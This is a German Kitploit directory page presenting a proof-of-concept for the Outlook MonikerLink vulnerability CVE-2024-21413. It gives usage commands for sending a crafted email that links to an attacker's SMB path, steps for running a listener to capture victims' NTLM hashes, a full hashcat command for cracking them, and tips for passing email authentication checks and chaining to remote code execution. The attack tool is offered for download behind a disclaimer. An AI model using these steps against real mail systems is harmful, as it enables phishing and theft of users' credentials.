Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21413 — Microsoft Outlook Schwachstelle zur Offenlegung von Informationen (leakt Passwort-Hash) - Expect-Skript POC | Kitploit
Tools/GitHubGitHub/duy-31/cve-2024-21413
Passwort-CrackingPhishing-ToolsSchwachstellenanalyseExploitationLernen & BildungE-Mail-Sicherheit
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Microsoft Outlook Schwachstelle zur Offenlegung von Informationen (leakt Passwort-Hash) - Expect-Skript POC

Repository anzeigen
15733vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21413 - Expect-Skript-POC

Microsoft Outlook-Leck von Anmeldedaten & Schwachstelle für Remote-Codeausführung, wenn sie mit CVE-2023-21716 verkettet wird (über das Vorschaufenster) CVSS:3.1 9.8 / 8.5

Outlook sollte Sie über das Risiko beim Öffnen eines externen Links warnen => aber das ist nicht der Fall!

image

Verwendung: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

Hinweise: chmod +x cve-2024-21413.sh

Erfordert die App expect & eine legitime Absender-IP und E-Mail-Absenderadresse (um SPF, DKIM, DMARC zu bestehen)


  • Zuerst einen SMB-Listener wie folgt ausführen

image

  • das PoC ausführen

image

  • und warten Sie auf die E-Mail und klicken Sie im Vorschaufenster auf den Link

image

  • danach sollten Sie den Login und den Hash der Person erhalten, die auf den Link geklickt hat (ohne den Warnhinweis auf betroffenen Outlook-Versionen)

    image

  • Danach können Sie versuchen, das Passwort mit hashcat zu knacken. Kopieren Sie einfach die gesamte Zeile mit dem Login-Namen in eine Datei und führen Sie hashcat mit Modul 5600 aus

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • Sie können diese CVE mit CVE-2023-21716 verketten, um RCE zu erlangen !!!

Dank an: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Workaround/Fix: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


mehr über mich ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Haftungsausschluss: WICHTIG: Dieses Skript wird ausschließlich für Bildungszwecke, ethische Tests und rechtmäßige Verwendung bereitgestellt. Verwenden Sie es nicht auf einem System oder Netzwerk ohne ausdrückliche Erlaubnis. Unbefugter Zugriff auf Computersysteme und Netzwerke ist illegal, und Benutzer, die bei unbefugten Aktivitäten erwischt werden, müssen mit rechtlichen Schritten rechnen. Der Autor ist NICHT verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.

Tool herunterladen